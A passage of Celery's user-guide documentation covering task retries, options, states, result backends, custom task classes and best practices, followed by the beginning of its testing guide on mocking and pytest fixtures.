:keyword:`try` ... :keyword:`except` statement: .. code-block:: python @app.task def refresh_timeline(user): try: twitter.refresh_timeline(user) except FailWhaleError as exc: raise div.retry(exc=exc, max_retries=5) If you want to automatically retry on any error, simply use: .. code-block:: python @app.task(autoretry_for=(Exception,)) def x(): ... .. versionadded:: 4.2 If your tasks depend on another service, like making a request to an API, then it's a good idea to use `exponential backoff`_ to avoid overwhelming the service with your requests. Fortunately, Celery's automatic retry support makes it easy. Just specify the :attr:`~Task.retry_backoff` argument, like this: .. code-block:: python from requests.exceptions import RequestException @app.task(autoretry_for=(RequestException,), retry_backoff=True) def x(): ... By default, this exponential backoff will also introduce random jitter_ to avoid having all the tasks run at the same moment. It will also cap the maximum backoff delay to 10 minutes. All these settings can be customized via options documented below. .. versionadded:: 4.4 You can also set `autoretry_for`, `max_retries`, `retry_backoff`, `retry_backoff_max` and `retry_jitter` options in class-based tasks: .. code-block:: python class BaseTaskWithRetry(Task): autoretry_for = (TypeError,) max_retries = 5 retry_backoff = True retry_backoff_max = 700 retry_jitter = False .. attribute:: Task.autoretry_for A list/tuple of exception classes. If any of these exceptions are raised during the execution of the task, the task will automatically be retried. By default, no exceptions will be autoretried. .. attribute:: Task.max_retries A number. Maximum number of retries before giving up. A value of ``None`` means task will retry forever. By default, this option is set to ``3``. .. attribute:: Task.retry_backoff A boolean, or a number. If this option is set to ``True``, autoretries will be delayed following the rules of `exponential backoff`_. The first retry will have a delay of 1 second, the second retry will have a delay of 2 seconds, the third will delay 4 seconds, the fourth will delay 8 seconds, and so on. (However, this delay value is modified by :attr:`~Task.retry_jitter`, if it is enabled.) If this option is set to a number, it is used as a delay factor. For example, if this option is set to ``3``, the first retry will delay 3 seconds, the second will delay 6 seconds, the third will delay 12 seconds, the fourth will delay 24 seconds, and so on. By default, this option is set to ``False``, and autoretries will not be delayed. .. attribute:: Task.retry_backoff_max A number. If ``retry_backoff`` is enabled, this option will set a maximum delay in seconds between task autoretries. By default, this option is set to ``600``, which is 10 minutes. .. attribute:: Task.retry_jitter A boolean. `Jitter`_ is used to introduce randomness into exponential backoff delays, to prevent all tasks in the queue from being executed simultaneously. If this option is set to ``True``, the delay value calculated by :attr:`~Task.retry_backoff` is treated as a maximum, and the actual delay value will be a random number between zero and that maximum. By default, this option is set to ``True``. .. _task-options: List of Options =============== The task decorator can take a number of options that change the way the task behaves, for example you can set the rate limit for a task using the :attr:`rate_limit` option. Any keyword argument passed to the task decorator will actually be set as an attribute of the resulting task class, and this is a list of the built-in attributes. General ------- .. _task-general-options: .. attribute:: Task.name The name the task is registered as. You can set this name manually, or a name will be automatically generated using the module and class name. See also :ref:`task-names`. .. attribute:: Task.request If the task is being executed this will contain information about the current request. Thread local storage is used. See :ref:`task-request-info`. .. attribute:: Task.max_retries Only applies if the task calls ``self.retry`` or if the task is decorated with the :ref:`autoretry_for ` argument. The maximum number of attempted retries before giving up. If the number of retries exceeds this value a :exc:`~@MaxRetriesExceededError` exception will be raised. .. note:: You have to call :meth:`~@Task.retry` manually, as it won't automatically retry on exception.. The default is ``3``. A value of :const:`None` will disable the retry limit and the task will retry forever until it succeeds. .. attribute:: Task.throws Optional tuple of expected error classes that shouldn't be regarded as an actual error. Errors in this list will be reported as a failure to the result backend, but the worker won't log the event as an error, and no traceback will be included. Example: .. code-block:: python @task(throws=(KeyError, HttpNotFound)): def get_foo(): something() Error types: - Expected errors (in ``Task.throws``) Logged with severity ``INFO``, traceback excluded. - Unexpected errors Logged with severity ``ERROR``, with traceback included. .. attribute:: Task.default_retry_delay Default time in seconds before a retry of the task should be executed. Can be either :class:`int` or :class:`float`. Default is a three minute delay. .. attribute:: Task.rate_limit Set the rate limit for this task type (limits the number of tasks that can be run in a given time frame). Tasks will still complete when a rate limit is in effect, but it may take some time before it's allowed to start. If this is :const:`None` no rate limit is in effect. If it is an integer or float, it is interpreted as "tasks per second". The rate limits can be specified in seconds, minutes or hours by appending `"/s"`, `"/m"` or `"/h"` to the value. Tasks will be evenly distributed over the specified time frame. Example: `"100/m"` (hundred tasks a minute). This will enforce a minimum delay of 600ms between starting two tasks on the same worker instance. Default is the :setting:`task_default_rate_limit` setting: if not specified means rate limiting for tasks is disabled by default. Note that this is a *per worker instance* rate limit, and not a global rate limit. To enforce a global rate limit (e.g., for an API with a maximum number of requests per second), you must restrict to a given queue. .. attribute:: Task.time_limit The hard time limit, in seconds, for this task. When not set the workers default is used. .. attribute:: Task.soft_time_limit The soft time limit for this task. When not set the workers default is used. .. attribute:: Task.ignore_result Don't store task state. Note that this means you can't use :class:`~celery.result.AsyncResult` to check if the task is ready, or get its return value. .. attribute:: Task.store_errors_even_if_ignored If :const:`True`, errors will be stored even if the task is configured to ignore results. .. attribute:: Task.serializer A string identifying the default serialization method to use. Defaults to the :setting:`task_serializer` setting. Can be `pickle`, `json`, `yaml`, or any custom serialization methods that have been registered with :mod:`kombu.serialization.registry`. Please see :ref:`calling-serializers` for more information. .. attribute:: Task.compression A string identifying the default compression scheme to use. Defaults to the :setting:`task_compression` setting. Can be `gzip`, or `bzip2`, or any custom compression schemes that have been registered with the :mod:`kombu.compression` registry. Please see :ref:`calling-compression` for more information. .. attribute:: Task.backend The result store backend to use for this task. An instance of one of the backend classes in `celery.backends`. Defaults to `app.backend`, defined by the :setting:`result_backend` setting. .. attribute:: Task.acks_late If set to :const:`True` messages for this task will be acknowledged **after** the task has been executed, not *just before* (the default behavior). Note: This means the task may be executed multiple times should the worker crash in the middle of execution. Make sure your tasks are :term:`idempotent`. The global default can be overridden by the :setting:`task_acks_late` setting. .. _task-track-started: .. attribute:: Task.track_started If :const:`True` the task will report its status as "started" when the task is executed by a worker. The default value is :const:`False` as the normal behavior is to not report that level of granularity. Tasks are either pending, finished, or waiting to be retried. Having a "started" status can be useful for when there are long running tasks and there's a need to report what task is currently running. The host name and process id of the worker executing the task will be available in the state meta-data (e.g., `result.info['pid']`) The global default can be overridden by the :setting:`task_track_started` setting. .. seealso:: The API reference for :class:`~@Task`. .. _task-states: States ====== Celery can keep track of the tasks current state. The state also contains the result of a successful task, or the exception and traceback information of a failed task. There are several *result backends* to choose from, and they all have different strengths and weaknesses (see :ref:`task-result-backends`). During its lifetime a task will transition through several possible states, and each state may have arbitrary meta-data attached to it. When a task moves into a new state the previous state is forgotten about, but some transitions can be deduced, (e.g., a task now in the :state:`FAILED` state, is implied to have been in the :state:`STARTED` state at some point). There are also sets of states, like the set of :state:`FAILURE_STATES`, and the set of :state:`READY_STATES`. The client uses the membership of these sets to decide whether the exception should be re-raised (:state:`PROPAGATE_STATES`), or whether the state can be cached (it can if the task is ready). You can also define :ref:`custom-states`. .. _task-result-backends: Result Backends --------------- If you want to keep track of tasks or need the return values, then Celery must store or send the states somewhere so that they can be retrieved later. There are several built-in result backends to choose from: SQLAlchemy/Django ORM, Memcached, RabbitMQ/QPid (``rpc``), and Redis -- or you can define your own. No backend works well for every use case. You should read about the strengths and weaknesses of each backend, and choose the most appropriate for your needs. .. warning:: Backends use resources to store and transmit results. To ensure that resources are released, you must eventually call :meth:`~@AsyncResult.get` or :meth:`~@AsyncResult.forget` on EVERY :class:`~@AsyncResult` instance returned after calling a task. .. seealso:: :ref:`conf-result-backend` RPC Result Backend (RabbitMQ/QPid) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The RPC result backend (`rpc://`) is special as it doesn't actually *store* the states, but rather sends them as messages. This is an important difference as it means that a result *can only be retrieved once*, and *only by the client that initiated the task*. Two different processes can't wait for the same result. Even with that limitation, it is an excellent choice if you need to receive state changes in real-time. Using messaging means the client doesn't have to poll for new states. The messages are transient (non-persistent) by default, so the results will disappear if the broker restarts. You can configure the result backend to send persistent messages using the :setting:`result_persistent` setting. Database Result Backend ~~~~~~~~~~~~~~~~~~~~~~~ Keeping state in the database can be convenient for many, especially for web applications with a database already in place, but it also comes with limitations. * Polling the database for new states is expensive, and so you should increase the polling intervals of operations, such as `result.get()`. * Some databases use a default transaction isolation level that isn't suitable for polling tables for changes. In MySQL the default transaction isolation level is `REPEATABLE-READ`: meaning the transaction won't see changes made by other transactions until the current transaction is committed. Changing that to the `READ-COMMITTED` isolation level is recommended. .. _task-builtin-states: Built-in States --------------- .. state:: PENDING PENDING ~~~~~~~ Task is waiting for execution or unknown. Any task id that's not known is implied to be in the pending state. .. state:: STARTED STARTED ~~~~~~~ Task has been started. Not reported by default, to enable please see :attr:`@Task.track_started`. :meta-data: `pid` and `hostname` of the worker process executing the task. .. state:: SUCCESS SUCCESS ~~~~~~~ Task has been successfully executed. :meta-data: `result` contains the return value of the task. :propagates: Yes :ready: Yes .. state:: FAILURE FAILURE ~~~~~~~ Task execution resulted in failure. :meta-data: `result` contains the exception occurred, and `traceback` contains the backtrace of the stack at the point when the exception was raised. :propagates: Yes .. state:: RETRY RETRY ~~~~~ Task is being retried. :meta-data: `result` contains the exception that caused the retry, and `traceback` contains the backtrace of the stack at the point when the exceptions was raised. :propagates: No .. state:: REVOKED REVOKED ~~~~~~~ Task has been revoked. :propagates: Yes .. _custom-states: Custom states ------------- You can easily define your own states, all you need is a unique name. The name of the state is usually an uppercase string. As an example you could have a look at the :mod:`abortable tasks <~celery.contrib.abortable>` which defines a custom :state:`ABORTED` state. Use :meth:`~@Task.update_state` to update a task's state:. .. code-block:: python @app.task(bind=True) def upload_files(self, filenames): for i, file in enumerate(filenames): if not self.request.called_directly: self.update_state(state='PROGRESS', meta={'current': i, 'total': len(filenames)}) Here I created the state `"PROGRESS"`, telling any application aware of this state that the task is currently in progress, and also where it is in the process by having `current` and `total` counts as part of the state meta-data. This can then be used to create progress bars for example. .. _pickling_exceptions: Creating pickleable exceptions ------------------------------ A rarely known Python fact is that exceptions must conform to some simple rules to support being serialized by the pickle module. Tasks that raise exceptions that aren't pickleable won't work properly when Pickle is used as the serializer. To make sure that your exceptions are pickleable the exception *MUST* provide the original arguments it was instantiated with in its ``.args`` attribute. The simplest way to ensure this is to have the exception call ``Exception.__init__``. Let's look at some examples that work, and one that doesn't: .. code-block:: python # OK: class HttpError(Exception): pass # BAD: class HttpError(Exception): def __init__(self, status_code): self.status_code = status_code # OK: class HttpError(Exception): def __init__(self, status_code): self.status_code = status_code Exception.__init__(self, status_code) # <-- REQUIRED So the rule is: For any exception that supports custom arguments ``*args``, ``Exception.__init__(self, *args)`` must be used. There's no special support for *keyword arguments*, so if you want to preserve keyword arguments when the exception is unpickled you have to pass them as regular args: .. code-block:: python class HttpError(Exception): def __init__(self, status_code, headers=None, body=None): self.status_code = status_code self.headers = headers self.body = body super(HttpError, self).__init__(status_code, headers, body) .. _task-semipredicates: Semipredicates ============== The worker wraps the task in a tracing function that records the final state of the task. There are a number of exceptions that can be used to signal this function to change how it treats the return of the task. .. _task-semipred-ignore: Ignore ------ The task may raise :exc:`~@Ignore` to force the worker to ignore the task. This means that no state will be recorded for the task, but the message is still acknowledged (removed from queue). This can be used if you want to implement custom revoke-like functionality, or manually store the result of a task. Example keeping revoked tasks in a Redis set: .. code-block:: python from celery.exceptions import Ignore @app.task(bind=True) def some_task(self): if redis.ismember('tasks.revoked', self.request.id): raise Ignore() Example that stores results manually: .. code-block:: python from celery import states from celery.exceptions import Ignore @app.task(bind=True) def get_tweets(self, user): timeline = twitter.get_timeline(user) if not self.request.called_directly: self.update_state(state=states.SUCCESS, meta=timeline) raise Ignore() .. _task-semipred-reject: Reject ------ The task may raise :exc:`~@Reject` to reject the task message using AMQPs ``basic_reject`` method. This won't have any effect unless :attr:`Task.acks_late` is enabled. Rejecting a message has the same effect as acking it, but some brokers may implement additional functionality that can be used. For example RabbitMQ supports the concept of `Dead Letter Exchanges`_ where a queue can be configured to use a dead letter exchange that rejected messages are redelivered to. .. _`Dead Letter Exchanges`: http://www.rabbitmq.com/dlx.html Reject can also be used to re-queue messages, but please be very careful when using this as it can easily result in an infinite message loop. Example using reject when a task causes an out of memory condition: .. code-block:: python import errno from celery.exceptions import Reject @app.task(bind=True, acks_late=True) def render_scene(self, path): file = get_file(path) try: renderer.render_scene(file) # if the file is too big to fit in memory # we reject it so that it's redelivered to the dead letter exchange # and we can manually inspect the situation. except MemoryError as exc: raise Reject(exc, requeue=False) except OSError as exc: if exc.errno == errno.ENOMEM: raise Reject(exc, requeue=False) # For any other error we retry after 10 seconds. except Exception as exc: raise self.retry(exc, countdown=10) Example re-queuing the message: .. code-block:: python from celery.exceptions import Reject @app.task(bind=True, acks_late=True) def requeues(self): if not self.request.delivery_info['redelivered']: raise Reject('no reason', requeue=True) print('received two times') Consult your broker documentation for more details about the ``basic_reject`` method. .. _task-semipred-retry: Retry ----- The :exc:`~@Retry` exception is raised by the ``Task.retry`` method to tell the worker that the task is being retried. .. _task-custom-classes: Custom task classes =================== All tasks inherit from the :class:`@Task` class. The :meth:`~@Task.run` method becomes the task body. As an example, the following code, .. code-block:: python @app.task def add(x, y): return x + y will do roughly this behind the scenes: .. code-block:: python class _AddTask(app.Task): def run(self, x, y): return x + y add = app.tasks[_AddTask.name] Instantiation ------------- A task is **not** instantiated for every request, but is registered in the task registry as a global instance. This means that the ``__init__`` constructor will only be called once per process, and that the task class is semantically closer to an Actor. If you have a task, .. code-block:: python from celery import Task class NaiveAuthenticateServer(Task): def __init__(self): self.users = {'george': 'password'} def run(self, username, password): try: return self.users[username] == password except KeyError: return False And you route every request to the same process, then it will keep state between requests. This can also be useful to cache resources, For example, a base Task class that caches a database connection: .. code-block:: python from celery import Task class DatabaseTask(Task): _db = None @property def db(self): if self._db is None: self._db = Database.connect() return self._db Per task usage ~~~~~~~~~~~~~~ The above can be added to each task like this: .. code-block:: python @app.task(base=DatabaseTask) def process_rows(): for row in process_rows.db.table.all(): process_row(row) The ``db`` attribute of the ``process_rows`` task will then always stay the same in each process. .. _custom-task-cls-app-wide: App-wide usage ~~~~~~~~~~~~~~ You can also use your custom class in your whole Celery app by passing it as the ``task_cls`` argument when instantiating the app. This argument should be either a string giving the python path to your Task class or the class itself: .. code-block:: python from celery import Celery app = Celery('tasks', task_cls='your.module.path:DatabaseTask') This will make all your tasks declared using the decorator syntax within your app to use your ``DatabaseTask`` class and will all have a ``db`` attribute. The default value is the class provided by Celery: ``'celery.app.task:Task'``. Handlers -------- .. method:: before_start(self, task_id, args, kwargs) Run by the worker before the task starts executing. .. versionadded:: 5.2 :param task_id: Unique id of the task to execute. :param args: Original arguments for the task to execute. :param kwargs: Original keyword arguments for the task to execute. The return value of this handler is ignored. .. method:: after_return(self, status, retval, task_id, args, kwargs, einfo) Handler called after the task returns. :param status: Current task state. :param retval: Task return value/exception. :param task_id: Unique id of the task. :param args: Original arguments for the task that returned. :param kwargs: Original keyword arguments for the task that returned. :keyword einfo: :class:`~billiard.einfo.ExceptionInfo` instance, containing the traceback (if any). The return value of this handler is ignored. .. method:: on_failure(self, exc, task_id, args, kwargs, einfo) This is run by the worker when the task fails. :param exc: The exception raised by the task. :param task_id: Unique id of the failed task. :param args: Original arguments for the task that failed. :param kwargs: Original keyword arguments for the task that failed. :keyword einfo: :class:`~billiard.einfo.ExceptionInfo` instance, containing the traceback. The return value of this handler is ignored. .. method:: on_retry(self, exc, task_id, args, kwargs, einfo) This is run by the worker when the task is to be retried. :param exc: The exception sent to :meth:`~@Task.retry`. :param task_id: Unique id of the retried task. :param args: Original arguments for the retried task. :param kwargs: Original keyword arguments for the retried task. :keyword einfo: :class:`~billiard.einfo.ExceptionInfo` instance, containing the traceback. The return value of this handler is ignored. .. method:: on_success(self, retval, task_id, args, kwargs) Run by the worker if the task executes successfully. :param retval: The return value of the task. :param task_id: Unique id of the executed task. :param args: Original arguments for the executed task. :param kwargs: Original keyword arguments for the executed task. The return value of this handler is ignored. .. _task-requests-and-custom-requests: Requests and custom requests ---------------------------- Upon receiving a message to run a task, the `worker `:ref: creates a `request `:class: to represent such demand. Custom task classes may override which request class to use by changing the attribute `celery.app.task.Task.Request`:attr:. You may either assign the custom request class itself, or its fully qualified name. The request has several responsibilities. Custom request classes should cover them all -- they are responsible to actually run and trace the task. We strongly recommend to inherit from `celery.worker.request.Request`:class:. When using the `pre-forking worker `:ref:, the methods `~celery.worker.request.Request.on_timeout`:meth: and `~celery.worker.request.Request.on_failure`:meth: are executed in the main worker process. An application may leverage such facility to detect failures which are not detected using `celery.app.task.Task.on_failure`:meth:. As an example, the following custom request detects and logs hard time limits, and other failures. .. code-block:: python import logging from celery import Task from celery.worker.request import Request logger = logging.getLogger('my.package') class MyRequest(Request): 'A minimal custom request to log failures and hard time limits.' def on_timeout(self, soft, timeout): super(MyRequest, self).on_timeout(soft, timeout) if not soft: logger.warning( 'A hard timeout was enforced for task %s', self.task.name ) def on_failure(self, exc_info, send_failed_event=True, return_ok=False): super().on_failure( exc_info, send_failed_event=send_failed_event, return_ok=return_ok ) logger.warning( 'Failure detected for task %s', self.task.name ) class MyTask(Task): Request = MyRequest # you can use a FQN 'my.package:MyRequest' @app.task(base=MyTask) def some_longrunning_task(): # use your imagination .. _task-how-they-work: How it works ============ Here come the technical details. This part isn't something you need to know, but you may be interested. All defined tasks are listed in a registry. The registry contains a list of task names and their task classes. You can investigate this registry yourself: .. code-block:: pycon >>> from proj.celery import app >>> app.tasks {'celery.chord_unlock': <@task: celery.chord_unlock>, 'celery.backend_cleanup': <@task: celery.backend_cleanup>, 'celery.chord': <@task: celery.chord>} This is the list of tasks built into Celery. Note that tasks will only be registered when the module they're defined in is imported. The default loader imports any modules listed in the :setting:`imports` setting. The :meth:`@task` decorator is responsible for registering your task in the applications task registry. When tasks are sent, no actual function code is sent with it, just the name of the task to execute. When the worker then receives the message it can look up the name in its task registry to find the execution code. This means that your workers should always be updated with the same software as the client. This is a drawback, but the alternative is a technical challenge that's yet to be solved. .. _task-best-practices: Tips and Best Practices ======================= .. _task-ignore_results: Ignore results you don't want ----------------------------- If you don't care about the results of a task, be sure to set the :attr:`~@Task.ignore_result` option, as storing results wastes time and resources. .. code-block:: python @app.task(ignore_result=True) def mytask(): something() Results can even be disabled globally using the :setting:`task_ignore_result` setting. .. versionadded::4.2 Results can be enabled/disabled on a per-execution basis, by passing the ``ignore_result`` boolean parameter, when calling ``apply_async`` or ``delay``. .. code-block:: python @app.task def mytask(x, y): return x + y # No result will be stored result = mytask.apply_async(1, 2, ignore_result=True) print result.get() # -> None # Result will be stored result = mytask.apply_async(1, 2, ignore_result=False) print result.get() # -> 3 By default tasks will *not ignore results* (``ignore_result=False``) when a result backend is configured. The option precedence order is the following: 1. Global :setting:`task_ignore_result` 2. :attr:`~@Task.ignore_result` option 3. Task execution option ``ignore_result`` More optimization tips ---------------------- You find additional optimization tips in the :ref:`Optimizing Guide `. .. _task-synchronous-subtasks: Avoid launching synchronous subtasks ------------------------------------ Having a task wait for the result of another task is really inefficient, and may even cause a deadlock if the worker pool is exhausted. Make your design asynchronous instead, for example by using *callbacks*. **Bad**: .. code-block:: python @app.task def update_page_info(url): page = fetch_page.delay(url).get() info = parse_page.delay(url, page).get() store_page_info.delay(url, info) @app.task def fetch_page(url): return myhttplib.get(url) @app.task def parse_page(page): return myparser.parse_document(page) @app.task def store_page_info(url, info): return PageInfo.objects.create(url, info) **Good**: .. code-block:: python def update_page_info(url): # fetch_page -> parse_page -> store_page chain = fetch_page.s(url) | parse_page.s() | store_page_info.s(url) chain() @app.task() def fetch_page(url): return myhttplib.get(url) @app.task() def parse_page(page): return myparser.parse_document(page) @app.task(ignore_result=True) def store_page_info(info, url): PageInfo.objects.create(url=url, info=info) Here I instead created a chain of tasks by linking together different :func:`~celery.signature`'s. You can read about chains and other powerful constructs at :ref:`designing-workflows`. By default Celery will not allow you to run subtasks synchronously within a task, but in rare or extreme cases you might need to do so. **WARNING**: enabling subtasks to run synchronously is not recommended! .. code-block:: python @app.task def update_page_info(url): page = fetch_page.delay(url).get(disable_sync_subtasks=False) info = parse_page.delay(url, page).get(disable_sync_subtasks=False) store_page_info.delay(url, info) @app.task def fetch_page(url): return myhttplib.get(url) @app.task def parse_page(url, page): return myparser.parse_document(page) @app.task def store_page_info(url, info): return PageInfo.objects.create(url, info) .. _task-performance-and-strategies: Performance and Strategies ========================== .. _task-granularity: Granularity ----------- The task granularity is the amount of computation needed by each subtask. In general it is better to split the problem up into many small tasks rather than have a few long running tasks. With smaller tasks you can process more tasks in parallel and the tasks won't run long enough to block the worker from processing other waiting tasks. However, executing a task does have overhead. A message needs to be sent, data may not be local, etc. So if the tasks are too fine-grained the overhead added probably removes any benefit. .. seealso:: The book `Art of Concurrency`_ has a section dedicated to the topic of task granularity [AOC1]_. .. _`Art of Concurrency`: http://oreilly.com/catalog/9780596521547 .. [AOC1] Breshears, Clay. Section 2.2.1, "The Art of Concurrency". O'Reilly Media, Inc. May 15, 2009. ISBN-13 978-0-596-52153-0. .. _task-data-locality: Data locality ------------- The worker processing the task should be as close to the data as possible. The best would be to have a copy in memory, the worst would be a full transfer from another continent. If the data is far away, you could try to run another worker at location, or if that's not possible - cache often used data, or preload data you know is going to be used. The easiest way to share data between workers is to use a distributed cache system, like `memcached`_. .. seealso:: The paper `Distributed Computing Economics`_ by Jim Gray is an excellent introduction to the topic of data locality. .. _`Distributed Computing Economics`: http://research.microsoft.com/pubs/70001/tr-2003-24.pdf .. _`memcached`: http://memcached.org/ .. _task-state: State ----- Since Celery is a distributed system, you can't know which process, or on what machine the task will be executed. You can't even know if the task will run in a timely manner. The ancient async sayings tells us that “asserting the world is the responsibility of the task”. What this means is that the world view may have changed since the task was requested, so the task is responsible for making sure the world is how it should be; If you have a task that re-indexes a search engine, and the search engine should only be re-indexed at maximum every 5 minutes, then it must be the tasks responsibility to assert that, not the callers. Another gotcha is Django model objects. They shouldn't be passed on as arguments to tasks. It's almost always better to re-fetch the object from the database when the task is running instead, as using old data may lead to race conditions. Imagine the following scenario where you have an article and a task that automatically expands some abbreviations in it: .. code-block:: python class Article(models.Model): title = models.CharField() body = models.TextField() @app.task def expand_abbreviations(article): article.body.replace('MyCorp', 'My Corporation') article.save() First, an author creates an article and saves it, then the author clicks on a button that initiates the abbreviation task: .. code-block:: pycon >>> article = Article.objects.get(id=102) >>> expand_abbreviations.delay(article) Now, the queue is very busy, so the task won't be run for another 2 minutes. In the meantime another author makes changes to the article, so when the task is finally run, the body of the article is reverted to the old version because the task had the old body in its argument. Fixing the race condition is easy, just use the article id instead, and re-fetch the article in the task body: .. code-block:: python @app.task def expand_abbreviations(article_id): article = Article.objects.get(id=article_id) article.body.replace('MyCorp', 'My Corporation') article.save() .. code-block:: pycon >>> expand_abbreviations.delay(article_id) There might even be performance benefits to this approach, as sending large messages may be expensive. .. _task-database-transactions: Database transactions --------------------- Let's have a look at another example: .. code-block:: python from django.db import transaction from django.http import HttpResponseRedirect @transaction.atomic def create_article(request): article = Article.objects.create() expand_abbreviations.delay(article.pk) return HttpResponseRedirect('/articles/') This is a Django view creating an article object in the database, then passing the primary key to a task. It uses the `transaction.atomic` decorator, that will commit the transaction when the view returns, or roll back if the view raises an exception. There's a race condition if the task starts executing before the transaction has been committed; The database object doesn't exist yet! The solution is to use the ``on_commit`` callback to launch your Celery task once all transactions have been committed successfully. .. code-block:: python from django.db.transaction import on_commit def create_article(request): article = Article.objects.create() on_commit(lambda: expand_abbreviations.delay(article.pk)) .. note:: ``on_commit`` is available in Django 1.9 and above, if you are using a version prior to that then the `django-transaction-hooks`_ library adds support for this. .. _`django-transaction-hooks`: https://github.com/carljm/django-transaction-hooks .. _task-example: Example ======= Let's take a real world example: a blog where comments posted need to be filtered for spam. When the comment is created, the spam filter runs in the background, so the user doesn't have to wait for it to finish. I have a Django blog application allowing comments on blog posts. I'll describe parts of the models/views and tasks for this application. ``blog/models.py`` ------------------ The comment model looks like this: .. code-block:: python from django.db import models from django.utils.translation import ugettext_lazy as _ class Comment(models.Model): name = models.CharField(_('name'), max_length=64) email_address = models.EmailField(_('email address')) homepage = models.URLField(_('home page'), blank=True, verify_exists=False) comment = models.TextField(_('comment')) pub_date = models.DateTimeField(_('Published date'), editable=False, auto_add_now=True) is_spam = models.BooleanField(_('spam?'), default=False, editable=False) class Meta: verbose_name = _('comment') verbose_name_plural = _('comments') In the view where the comment is posted, I first write the comment to the database, then I launch the spam filter task in the background. .. _task-example-blog-views: ``blog/views.py`` ----------------- .. code-block:: python from django import forms from django.http import HttpResponseRedirect from django.template.context import RequestContext from django.shortcuts import get_object_or_404, render_to_response from blog import tasks from blog.models import Comment class CommentForm(forms.ModelForm): class Meta: model = Comment def add_comment(request, slug, template_name='comments/create.html'): post = get_object_or_404(Entry, slug=slug) remote_addr = request.META.get('REMOTE_ADDR') if request.method == 'post': form = CommentForm(request.POST, request.FILES) if form.is_valid(): comment = form.save() # Check spam asynchronously. tasks.spam_filter.delay(comment_id=comment.id, remote_addr=remote_addr) return HttpResponseRedirect(post.get_absolute_url()) else: form = CommentForm() context = RequestContext(request, {'form': form}) return render_to_response(template_name, context_instance=context) To filter spam in comments I use `Akismet`_, the service used to filter spam in comments posted to the free blog platform `Wordpress`. `Akismet`_ is free for personal use, but for commercial use you need to pay. You have to sign up to their service to get an API key. To make API calls to `Akismet`_ I use the `akismet.py`_ library written by `Michael Foord`_. .. _task-example-blog-tasks: ``blog/tasks.py`` ----------------- .. code-block:: python from celery import Celery from akismet import Akismet from django.core.exceptions import ImproperlyConfigured from django.contrib.sites.models import Site from blog.models import Comment app = Celery(broker='amqp://') @app.task def spam_filter(comment_id, remote_addr=None): logger = spam_filter.get_logger() logger.info('Running spam filter for comment %s', comment_id) comment = Comment.objects.get(pk=comment_id) current_domain = Site.objects.get_current().domain akismet = Akismet(settings.AKISMET_KEY, 'http://{0}'.format(domain)) if not akismet.verify_key(): raise ImproperlyConfigured('Invalid AKISMET_KEY') is_spam = akismet.comment_check(user_ip=remote_addr, comment_content=comment.comment, comment_author=comment.name, comment_author_email=comment.email_address) if is_spam: comment.is_spam = True comment.save() return is_spam .. _`Akismet`: http://akismet.com/faq/ .. _`akismet.py`: http://www.voidspace.org.uk/downloads/akismet.py .. _`Michael Foord`: http://www.voidspace.org.uk/ .. _`exponential backoff`: https://en.wikipedia.org/wiki/Exponential_backoff .. _`jitter`: https://en.wikipedia.org/wiki/Jitter ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/testing.rst0000664000175000017500000002554200000000000020040 0ustar00asifasif00000000000000.. _testing: ================================================================ Testing with Celery ================================================================ Tasks and unit tests ==================== To test task behavior in unit tests the preferred method is mocking. .. admonition:: Eager mode The eager mode enabled by the :setting:`task_always_eager` setting is by definition not suitable for unit tests. When testing with eager mode you are only testing an emulation of what happens in a worker, and there are many discrepancies between the emulation and what happens in reality. Note that eagerly executed tasks don't write results to backend by default. If you want to enable this functionality, have a look at :setting:`task_store_eager_result`. A Celery task is much like a web view, in that it should only define how to perform the action in the context of being called as a task. This means optimally tasks only handle things like serialization, message headers, retries, and so on, with the actual logic implemented elsewhere. Say we had a task like this: .. code-block:: python from .models import Product @app.task(bind=True) def send_order(self, product_pk, quantity, price): price = Decimal(price) # json serializes this to string. # models are passed by id, not serialized. product = Product.objects.get(product_pk) try: product.order(quantity, price) except OperationalError as exc: raise self.retry(exc=exc) ``Note``: A task being `bound `_ means the first argument to the task will always be the task instance (self). which means you do get a self argument as the first argument and can use the Task class methods and attributes. You could write unit tests for this task, using mocking like in this example: .. code-block:: python from pytest import raises from celery.exceptions import Retry # for python 2: use mock.patch from `pip install mock`. from unittest.mock import patch from proj.models import Product from proj.tasks import send_order class test_send_order: @patch('proj.tasks.Product.order') # < patching Product in module above def test_success(self, product_order): product = Product.objects.create( name='Foo', ) send_order(product.pk, 3, Decimal(30.3)) product_order.assert_called_with(3, Decimal(30.3)) @patch('proj.tasks.Product.order') @patch('proj.tasks.send_order.retry') def test_failure(self, send_order_retry, product_order): product = Product.objects.create( name='Foo', ) # Set a side effect on the patched methods # so that they raise the errors we want. send_order_retry.side_effect = Retry() product_order.side_effect = OperationalError() with raises(Retry): send_order(product.pk, 3, Decimal(30.6)) .. _pytest_plugin: pytest ====== .. versionadded:: 4.0 Celery also makes a :pypi:`pytest` plugin available that adds fixtures that you can use in your integration (or unit) test suites. Enabling -------- Celery initially ships the plugin in a disabled state, to enable it you can either: * ``pip install celery[pytest]`` * ``pip install pytest-celery`` * or add an environment variable ``PYTEST_PLUGINS=celery.contrib.pytest`` * or add ``pytest_plugins = ("celery.contrib.pytest", )`` to your root conftest.py Marks ----- ``celery`` - Set test app configuration. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The ``celery`` mark enables you to override the configuration used for a single test case: .. code-block:: python @pytest.mark.celery(result_backend='redis://') def test_something(): ... or for all the test cases in a class: .. code-block:: python @pytest.mark.celery(result_backend='redis://') class test_something: def test_one(self): ... def test_two(self): ... Fixtures -------- Function scope ^^^^^^^^^^^^^^ ``celery_app`` - Celery app used for testing. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This fixture returns a Celery app you can use for testing. Example: .. code-block:: python def test_create_task(celery_app, celery_worker): @celery_app.task def mul(x, y): return x * y assert mul.delay(4, 4).get(timeout=10) == 16 ``celery_worker`` - Embed live worker. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This fixture starts a Celery worker instance that you can use for integration tests. The worker will be started in a *separate thread* and will be shutdown as soon as the test returns. By default the fixture will wait up to 10 seconds for the worker to complete outstanding tasks and will raise an exception if the time limit is exceeded. The timeout can be customized by setting the ``shutdown_timeout`` key in the dictionary returned by the :func:`celery_worker_parameters` fixture. Example: .. code-block:: python # Put this in your conftest.py 